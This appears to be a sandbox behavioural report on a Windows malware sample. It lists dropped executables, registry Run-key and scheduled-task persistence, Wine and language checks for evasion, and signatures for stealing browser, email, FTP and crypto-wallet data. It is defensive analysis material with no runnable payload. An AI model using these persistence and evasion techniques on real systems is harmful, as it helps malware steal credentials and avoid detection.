Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035810101\9e28748818.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempNIKU2KFNSI0OSCJ5SNYFIAJYHYQOJDXS.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\ProgramData\eltqgcf\oamb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036430101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\ProgramData\eltqgcf\oamb.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9e28748818.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035810101\\9e28748818.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035820121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\eltqgcf\oamb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036430101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempNIKU2KFNSI0OSCJ5SNYFIAJYHYQOJDXS.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10035810101\9e28748818.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133850860752177191" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035810101\9e28748818.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035810101\9e28748818.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035810101\9e28748818.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2068 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe
